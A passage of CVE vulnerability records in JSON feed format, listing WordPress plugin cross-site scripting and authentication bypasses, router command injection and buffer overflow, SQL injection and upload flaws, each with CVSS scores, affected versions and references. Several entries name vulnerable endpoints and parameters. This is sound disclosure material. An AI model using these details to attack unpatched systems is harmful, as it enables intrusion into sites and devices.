"https://www.wordfence.com/threat-intel/vulnerabilities/id/ddd83877-739f-4c21-8179-20de8bbc4936?source=cve", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The OAuth Single Sign On – SSO (OAuth Client) plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 6.26.3. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the username and the user does not have an already-existing account for the service returning the token." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "HIGH", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-12-12T04:15Z", "lastModifiedDate" : "2024-12-12T04:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10112", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79147dad-4bce-40fb-b9c1-e211845251a0?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/79147dad-4bce-40fb-b9c1-e211845251a0?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://wordpress.org/plugins/simple-news/#developers", "name" : "https://wordpress.org/plugins/simple-news/#developers", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Simple News plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'news' shortcode in all versions up to, and including, 2.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 3.1, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-25T09:15Z", "lastModifiedDate" : "2024-10-25T12:56Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10113", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0597a63d-2627-477f-874a-c35b6df7afd5?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/0597a63d-2627-477f-874a-c35b6df7afd5?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/wpadcenter/#developers", "name" : "https://wordpress.org/plugins/wpadcenter/#developers", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP AdCenter – Ad Manager & Adsense Ads plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpadcenter_ad shortcode in all versions up to, and including, 2.5.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpeka:wp_adcenter:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.5.7", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-15T06:15Z", "lastModifiedDate" : "2024-11-19T21:26Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10114", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/71df23bf-8f51-4260-be1f-ed5bc29d4afe?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/71df23bf-8f51-4260-be1f-ed5bc29d4afe?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wpwebelite.com/changelogs/woocommerce-social-login/changelog.txt", "name" : "https://www.wpwebelite.com/changelogs/woocommerce-social-login/changelog.txt", "refsource" : "", "tags" : [ "Release Notes" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WooCommerce - Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.7.7. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpwebelite:woocommerce_social_login:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.7.8", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-11-05T09:15Z", "lastModifiedDate" : "2025-08-01T02:07Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10115", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-9884. Reason: This candidate is a reservation duplicate of CVE-2024-9884. Notes: All CVE users should reference CVE-2024-9884 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-18T19:15Z", "lastModifiedDate" : "2024-10-18T19:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10116", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/twitter-follow/trunk/twitter-follow.php#L34", "name" : "https://plugins.trac.wordpress.org/browser/twitter-follow/trunk/twitter-follow.php#L34", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3194573%40twitter-follow%2Ftrunk&old=1852833%40twitter-follow%2Ftrunk", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3194573%40twitter-follow%2Ftrunk&old=1852833%40twitter-follow%2Ftrunk", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://wordpress.org/plugins/twitter-follow/#developers", "name" : "https://wordpress.org/plugins/twitter-follow/#developers", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/fac89439-bd0a-4772-858d-d11dd0de54b6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/fac89439-bd0a-4772-858d-d11dd0de54b6?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Twitter Follow Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'username' parameter in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:firecask:twitter_follow_button:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "0.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-11-23T04:15Z", "lastModifiedDate" : "2025-07-15T20:02Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10117", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7813dfdc-06e0-4fa9-aabe-b5b9772368c2?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/7813dfdc-06e0-4fa9-aabe-b5b9772368c2?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://wordpress.org/plugins/wp-crowdfunding/#developers", "name" : "https://wordpress.org/plugins/wp-crowdfunding/#developers", "refsource" : "", "tags" : [ "Release Notes" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3174230/#file19", "name" : "https://plugins.trac.wordpress.org/changeset/3174230/#file19", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3174230/", "name" : "https://plugins.trac.wordpress.org/changeset/3174230/", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://docs.themeum.com/wp-crowdfunding/", "name" : "https://docs.themeum.com/wp-crowdfunding/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Crowdfunding plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpcf_donate shortcode in all versions up to, and including, 2.1.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:themeum:wp_crowdfunding:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.1.12", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-26T12:15Z", "lastModifiedDate" : "2025-02-11T17:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10118", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/en/cp-139-8155-c1ea6-2.html", "name" : "https://www.twcert.org.tw/en/cp-139-8155-c1ea6-2.html", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-8154-69fa5-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-8154-69fa5-1.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "SECOM WRTR-304GN-304TW-UPSC does not properly filter user input in the specific functionality. Unauthenticated remote attackers can exploit this vulnerability to inject and execute arbitrary system commands on the device." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-10-18T04:15Z", "lastModifiedDate" : "2024-10-18T12:52Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10119", "ASSIGNER" : "cve@cert.org.tw" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-78" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.twcert.org.tw/en/cp-139-8157-e0461-2.html", "name" : "https://www.twcert.org.tw/en/cp-139-8157-e0461-2.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.twcert.org.tw/tw/cp-132-8156-81c9d-1.html", "name" : "https://www.twcert.org.tw/tw/cp-132-8156-81c9d-1.html", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The wireless router WRTM326 from SECOM does not properly validate a specific parameter. An unauthenticated remote attacker could execute arbitrary system commands by sending crafted requests." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zte:wrtm326_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding" : "2.3.20", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zte:wrtm326:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-18T05:15Z", "lastModifiedDate" : "2024-11-01T18:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1012", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md", "name" : "https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.252281", "name" : "https://vuldb.com/?ctiid.252281", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?id.252281", "name" : "https://vuldb.com/?id.252281", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md", "name" : "https://github.com/4nNns/cveAdd/blob/b73e94ff089ae2201d9836b4d61b8175ff21618a/sqli/%E4%B8%87%E6%88%B7EZOFFICE%20%E5%89%8D%E5%8F%B0SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252281", "name" : "https://vuldb.com/?id.252281", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] }, { "url" : "https://vuldb.com/?ctiid.252281", "name" : "https://vuldb.com/?ctiid.252281", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory", "VDB Entry" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, has been found in Wanhu ezOFFICE 11.1.0. This issue affects some unknown processing of the file defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp. The manipulation of the argument recordId leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252281 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:whir:ezoffice:11.1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-31T08:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10120", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/weliveby/ForCVE/blob/main/radar%20Arbitrary%20file%20upload%20vulnerability.md", "name" : "https://github.com/weliveby/ForCVE/blob/main/radar%20Arbitrary%20file%20upload%20vulnerability.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280912", "name" : "VDB-280912 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280912", "name" : "VDB-280912 | wfh45678 Radar upload unrestricted upload", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.420959", "name" : "Submit #420959 | radar <=1.0.8 Unrestricted Upload", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability has been found in wfh45678 Radar up to 1.0.8 and classified as critical. This vulnerability affects unknown code of the file /services/v1/common/upload. The manipulation of the argument file leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:riskengine:radar:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-18T17:15Z", "lastModifiedDate" : "2024-10-30T20:20Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10121", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/weliveby/ForCVE/blob/main/radar%20Authentication%20bypass%20vulnerability.md", "name" : "https://github.com/weliveby/ForCVE/blob/main/radar%20Authentication%20bypass%20vulnerability.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280913", "name" : "VDB-280913 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280913", "name" : "VDB-280913 | wfh45678 Radar Interface authorization", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.420960", "name" : "Submit #420960 | radar <=1.0.8 Authorization Bypass", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in wfh45678 Radar up to 1.0.8 and classified as critical. This issue affects some unknown processing of the component Interface Handler. The manipulation with the input /../ leads to authorization bypass. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This appears not to be a path traversal weakness. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:riskengine:radar:*:*:*:*:*:*:*:*", "versionEndIncluding" : "1.0.8", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-18T19:15Z", "lastModifiedDate" : "2024-10-30T21:21Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10122", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-549" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?id.280914", "name" : "VDB-280914 | Topdata Inner Rep Plus WebServer Operator Details Form InnerRepPlus.html missing password field masking", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280914", "name" : "VDB-280914 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.421292", "name" : "Submit #421292 | Topdata Top Data Inner Rep Plus Web Server v.2.01 Missing Password Field Masking", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Topdata Inner Rep Plus WebServer 2.01. It has been classified as problematic. Affected is an unknown function of the file /InnerRepPlus.html of the component Operator Details Form. The manipulation leads to missing password field masking. It is possible to launch the attack remotely. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:topdata:inner_rep_plus:2.01:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.9, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.2, "impactScore" : 3.6 } }, "publishedDate" : "2024-10-18T19:15Z", "lastModifiedDate" : "2024-11-06T22:05Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10123", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-121" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/JohenanLi/router_vuls/blob/main/ac8v4/compare_parentcontrol_time_vul.md", "name" : "https://github.com/JohenanLi/router_vuls/blob/main/ac8v4/compare_parentcontrol_time_vul.md", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?ctiid.280915", "name" : "VDB-280915 | CTI Indicators (IOB, IOC, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280915", "name" : "VDB-280915 | Tenda AC8 saveParentControlInfo compare_parentcontrol_time stack-based overflow", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?submit.421340", "name" : "Submit #421340 | Tenda AC8v4 V16.03.34.06 Stack-based Buffer Overflow", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.tenda.com.cn/", "name" : "https://www.tenda.com.cn/", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in Tenda AC8 16.03.34.06. It has been declared as critical. Affected by this vulnerability is the function compare_parentcontrol_time of the file /goform/saveParentControlInfo. The manipulation of the argument time leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. This is not the same issue like CVE-2023-33671. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:tenda:ac8_firmware:16.03.34.06:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:tenda:ac8:4.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 8.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 2.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-18T20:15Z", "lastModifiedDate" : "2024-10-28T16:06Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10124", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-284" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/vayu-blocks/trunk/inc/vayu-sites/app.php#L28", "name" : 